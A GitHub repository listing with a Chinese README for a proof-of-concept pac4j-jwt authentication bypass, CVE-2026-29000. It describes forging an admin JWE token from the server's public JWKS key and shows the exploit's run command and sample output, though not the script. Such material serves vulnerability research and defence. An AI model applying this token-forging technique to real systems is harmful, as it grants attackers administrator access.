manbahadurthapa1248/CVE-2026-29000---pac4j-jwt-Authentication-Bypass-PoC

GitHub: manbahadurthapa1248/CVE-2026-29000---pac4j-jwt-Authentication-Bypass-PoC

针对CVE-2026-29000漏洞的验证工具,通过获取JWKS公钥伪造JWE令牌实现pac4j-jwt认证绕过。

Stars: 0 | Forks: 0

# **CVE-2026-29000 - pac4j-jwt 认证绕过 PoC** *注意:这不是我的原创工作。我将其保留在此处以供参考。* **工作原理:** ``` python3 exploit.py http://IP:PORT [*] Fetching JWKS... [+] Got RSA public key (kid: enc-key-1) [*] Crafted PlainJWT with sub=admin, role=ROLE_ADMIN [+] Forged JWE token created [*] Accessing /api/dashboard... [+] Status: 200 [+] Authenticated as: admin (ROLE_ADMIN) [+] Token: eyJhbGciOiAiUlN_.....[Redacted].....D4zwSEY05lFkCB.J933HR-irY6a0r2uivRLZw ```
标签:CVE-2026-29000, GHAS, Java安全, JSON Web Token, JWE伪造, JWKS泄露, JWT伪造, Maven, pac4j-jwt, PoC, RSA公钥泄露, Web安全, 协议分析, 暴力破解, 权限提升, 漏洞验证, 蓝队分析, 认证绕过, 访问控制失效, 身份验证绕过